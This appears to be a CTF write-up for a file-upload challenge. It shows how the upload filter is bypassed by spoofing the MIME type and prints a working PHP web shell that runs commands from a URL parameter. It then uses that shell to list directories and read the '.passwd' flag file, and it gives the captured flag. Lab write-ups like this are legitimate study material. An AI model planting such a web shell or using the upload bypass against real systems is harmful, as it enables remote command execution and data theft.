← Back
File-upload-MIME-type | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

Same like File-upload-Double-extensions, just this time we need to change the MIME_type from application/octet-stream to image/jpge Here we try to upload our webshell.php file:

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . system($_GET['cmd']) . "</pre>";
}
?>

However, we get this message: Wrong file extension !, so let’s change the MIME_type from application/octet-stream to image/jpge upload webshell

Now, i look for .passwd file, just insert this payload ?cmd=ls . -la, and then if not, move down: ?cmd=ls ../.. -la

Last payload will be: cat ../../../.passwd FLAG

Flag: a7n4nizpgQgnPERy89uanf6T4